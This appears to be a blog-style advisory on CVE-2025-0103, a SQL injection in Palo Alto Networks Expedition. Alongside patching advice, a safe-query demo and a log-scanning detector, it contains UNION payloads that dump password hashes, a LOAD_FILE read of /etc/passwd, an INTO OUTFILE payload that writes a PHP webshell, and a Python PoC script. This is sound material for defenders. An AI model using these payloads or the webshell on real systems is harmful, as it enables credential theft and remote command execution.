Palo Alto Networks’ *Expedition* is a migration and optimization tool used by many organizations worldwide. In January 2025, CVE-2025-0103 was disclosed: a severe SQL injection flaw that lets any authenticated Expedition user read the application database, exposing password hashes, usernames, device configurations and device API keys, and even create or read arbitrary files on the filesystem.

In this post, we’ll break down CVE-2025-0103 in plain English, show proof-of-concept code, and detail the exploit vector — all so you can patch fast or defend before real-world attack groups weaponize it.

1. What is Palo Alto Networks Expedition?

Expedition (previously called the Migration Tool) helps users migrate configurations from third-party firewalls to Palo Alto Networks devices and optimize their policies. Expedition is typically deployed on-premises as a Linux VM. Its security matters because it routinely holds confidential network policies and firewall credentials.

2. The Vulnerability: CVE-2025-0103 Explained

A weakness exists in how Expedition handles certain authenticated web requests. Some endpoints take user-supplied input and embed it directly into SQL queries, without sanitization or prepared statements. Two classes of impact follow:

- Data exposure: an authenticated user can read the Expedition database, including password hashes, usernames, device configurations, device API keys and integration data.

- File manipulation: the same injection can be used to read or create arbitrary files on the Expedition VM (subject to database privileges and filesystem permissions).

Impact:
While access requires a valid Expedition user account, many deployments give admin-level access widely or tie authentication to core IT systems. A malicious insider — or any attacker with a foothold — can escalate access, steal secrets, and potentially pivot to other systems.

3. Technical Details & Proof-of-Concept

Expedition’s backend uses PHP and MySQL/MariaDB. Several HTTP POST endpoints accept parameters that are concatenated directly into SQL statements.

A common vulnerable pattern (simplified PHP, illustrative rather than Expedition's actual source)

// Vulnerable pattern: user input concatenated straight into the SQL string
$id = $_POST['id'];
$sql = "SELECT * FROM devices WHERE id = '$id'";
$result = $db->query($sql);  // No parameter binding: a quote inside $id becomes SQL syntax

An attacker submitting crafted id input can manipulate the query logic to extract sensitive data — classic SQL injection.

a. Stealing Password Hashes

Suppose an endpoint /api/getDevice expects a POST like { "id": "7" }.

Instead, the attacker supplies

{ "id": "7' UNION SELECT 1,username,password,4,5 from users -- " }

The resulting SQL

SELECT * FROM devices WHERE id = '7' UNION SELECT 1,username,password,4,5 from users -- '

*Now the rows of the users table come back alongside the device record!* The trailing comment (-- followed by a space) discards the application's own closing quote, and the UNION's column count (five here) has to match the original SELECT, which an attacker establishes by trial and error.
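The vulnerable pattern and the parameterized fix side by side, as an added example rather than code from this post or from Expedition itself. It uses Python with an in-memory SQLite database standing in for Expedition's MariaDB; the table layouts are constructed (a five-column devices table so the UNION payload above lines up) and are not Expedition's real schema:

```python
import sqlite3

# Constructed stand-in schema (assumption: a five-column devices table so the
# five-column UNION payload from the post lines up). Not Expedition's real tables.
SCHEMA = """
CREATE TABLE devices (id INTEGER, name TEXT, serial TEXT, model TEXT, mgmt_ip TEXT);
CREATE TABLE users   (id INTEGER, username TEXT, password TEXT);
INSERT INTO devices VALUES (7, 'edge-fw-01', '007951000001', 'PA-3220', '10.0.0.1');
INSERT INTO users   VALUES (1, 'admin',    '$2y$10$constructedhash.admin');
INSERT INTO users   VALUES (2, 'migrator', '$2y$10$constructedhash.migrator');
"""

# The injection payload from the post: closes the quote, appends a UNION over
# the users table, and comments out the application's trailing quote.
PAYLOAD = "7' UNION SELECT 1,username,password,4,5 FROM users -- "


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def get_device_vulnerable(conn, device_id):
    # Same shape as the PHP snippet: input concatenated straight into the SQL text,
    # so the quote and UNION inside device_id are parsed as SQL syntax.
    sql = f"SELECT * FROM devices WHERE id = '{device_id}'"
    return conn.execute(sql).fetchall()


def get_device_safe(conn, device_id):
    # Parameterized query: the value travels out of band and is only ever compared
    # against the id column, never parsed. The payload simply matches no row.
    sql = "SELECT * FROM devices WHERE id = ?"
    return conn.execute(sql, (device_id,)).fetchall()


def leaked_credentials(rows):
    # Rows that came from the UNION carry the attacker's filler constants (1, 4, 5)
    # around the username and password columns; pull those pairs out.
    return [(r[1], r[2]) for r in rows if r[0] == 1 and r[3] == 4 and r[4] == 5]


if __name__ == "__main__":
    conn = open_db()
    rows = get_device_vulnerable(conn, PAYLOAD)
    print("vulnerable query returned:", rows)
    print("leaked credentials:", leaked_credentials(rows))
    print("parameterized query returned:", get_device_safe(conn, PAYLOAD))
```

Run it and the concatenated query returns the legitimate device plus one row per user, while the parameterized version returns nothing for the same input. The fix is not escaping but binding: the driver never lets the payload reach the SQL parser as syntax.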

b. Reading Files

If the database account holds the FILE privilege and secure_file_priv does not forbid it, MySQL's LOAD_FILE() function can be injected through the same UNION to read files from the Expedition VM

SELECT LOAD_FILE('/etc/passwd')

Payload in POST

{ "id": "1' UNION SELECT 1,LOAD_FILE('/etc/passwd'),3,4,5 -- " }

c. Creating Files

With MySQL's INTO OUTFILE, attackers can also try to write files, for example to drop a webshell (if the target directory is writable by the database process and secure_file_priv does not block it). The column count again has to match, and the double quotes must be escaped to keep the request valid JSON:

{ "id": "1' UNION SELECT 1,\"<?php system($_GET['cmd']); ?>\",3,4,5 INTO OUTFILE '/var/www/html/shell.php' -- " }

*Note: MySQL writes all selected columns tab-separated into the file; the PHP tag still executes because everything outside <?php ... ?> is emitted as plain text. Whether this works at all depends on DB configuration and filesystem permissions.*

4. Live Exploit Demo (Python PoC)

*For educational/defense use only.*

import requests
import urllib3

# Expedition VMs commonly run with self-signed certificates; silence the warning verify=False triggers
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Expedition URL (the endpoint name is illustrative) and an authenticated session
url = 'https://expedition.example.com/api/getDevice'
headers = {'Content-Type': 'application/json'}
cookies = {'PHPSESSID': 'YOUR_SESSION_ID_HERE'}  # Must be a valid, authenticated session

# Injected payload to leak the users table via UNION
payload = {
    "id": "7' UNION SELECT 1,username,password,4,5 FROM users -- "
}

r = requests.post(url, json=payload, headers=headers, cookies=cookies, verify=False)
print(r.status_code)
print(r.text)

# For file read, swap the payload for the LOAD_FILE('/etc/passwd') variant shown above

5. How To Fix

- Update: Palo Alto Networks fixed this issue in Expedition 1.2.100; upgrade to that release or later (see the official advisory for details). Expedition reached end of life on 31 December 2024, so do not expect further fixes and plan its retirement.

- Restrict access: limit network access to the Expedition host to the administrators who actually need it, and remove or disable accounts that do not.

- Harden the database: make sure the application's MySQL/MariaDB account does not hold the FILE privilege and that secure_file_priv is set, which blocks the LOAD_FILE() and INTO OUTFILE variants described above.

- Review logs: check web and database logs for UNION SELECT, LOAD_FILE and INTO OUTFILE appearing in request parameters or executed queries.
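To support the log review, here is an added example (not from the original post or from Palo Alto Networks) that flags the injection indicators discussed in this post in MySQL-style general query log lines. The log lines are constructed, general_log must be enabled on the database for this source to exist, and the rule names and the line-parsing regex are this example's own:

```python
import re

# Constructed sample in MySQL-style general_log format (timestamp, connection id,
# command, argument). Not real Expedition logs. The last line is a benign query
# that contains the word "union" in data, to show the rules do not trip on it.
SAMPLE_LOG = [
    "2025-01-09T10:15:02.123456Z\t   42 Query\tSELECT * FROM devices WHERE id = '7'",
    "2025-01-09T10:15:09.553211Z\t   42 Query\tSELECT * FROM devices WHERE id = '7' UNION SELECT 1,username,password,4,5 from users -- '",
    "2025-01-09T10:16:01.000000Z\t   43 Query\tSELECT * FROM devices WHERE id = '1' UNION SELECT 1,LOAD_FILE('/etc/passwd'),3,4,5 -- '",
    """2025-01-09T10:17:30.000000Z\t   43 Query\tSELECT * FROM devices WHERE id = '1' UNION SELECT 1,"<?php system($_GET['cmd']); ?>",3,4,5 INTO OUTFILE '/var/www/html/shell.php' -- '""",
    "2025-01-09T10:18:00.000000Z\t   44 Query\tSELECT name FROM devices WHERE name LIKE '%union-office%'",
]

# One general_log record: ISO timestamp, connection id, command, argument text.
LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<conn>\d+)\s+(?P<cmd>\w+)\s+(?P<arg>.*)$")

# Indicators matching the techniques described in this post.
RULES = [
    ("union_select", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)),
    ("load_file", re.compile(r"\bLOAD_FILE\s*\(", re.I)),
    ("into_outfile", re.compile(r"\bINTO\s+(?:OUT|DUMP)FILE\b", re.I)),
    # A query ending in "-- " followed by a stray quote is the signature of an
    # injected comment swallowing the application's own closing quote.
    ("comment_truncation", re.compile(r"--\s+'\s*$")),
]


def parse_line(line):
    m = LOG_LINE.match(line)
    if not m:
        return None
    return {"ts": m["ts"], "conn_id": int(m["conn"]), "cmd": m["cmd"], "arg": m["arg"]}


def scan_general_log(lines):
    # Returns one finding per suspicious statement, with the rules it matched,
    # so the connection id can be tied back to the web session that issued it.
    findings = []
    for lineno, line in enumerate(lines, start=1):
        rec = parse_line(line)
        if rec is None or rec["cmd"] not in ("Query", "Execute"):
            continue
        hits = [name for name, rx in RULES if rx.search(rec["arg"])]
        if hits:
            findings.append({"line": lineno, "conn_id": rec["conn_id"],
                             "rules": hits, "query": rec["arg"]})
    return findings


if __name__ == "__main__":
    for f in scan_general_log(SAMPLE_LOG):
        print(f"line {f['line']} conn {f['conn_id']}: {', '.join(f['rules'])}")
        print("   ", f["query"])
```

Three of the five sample lines are flagged and the benign LIKE query is not. MariaDB's general log uses a two-token timestamp rather than the single ISO field assumed here, so adjust LOG_LINE before pointing this at a MariaDB-backed Expedition; the indicator rules themselves apply unchanged.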

6. References & Official Sources

- Palo Alto Networks Expedition Home
- Expedition Release Notes – Patch Details
- NVD Entry for CVE-2025-0103
- OWASP SQL Injection Cheat Sheet

7. Final Thoughts

CVE-2025-0103 is a wake-up call for anyone running Expedition quietly in the back-office or buried deep in your network zone. SQL injection is a classic — but when it hits modern admin tools, the impact can be devastating. Patch today, audit user access, and scan your logs for telltale signs that someone’s been poking around your backend database.

Timeline

Published on: 01/11/2025 03:15:22 UTC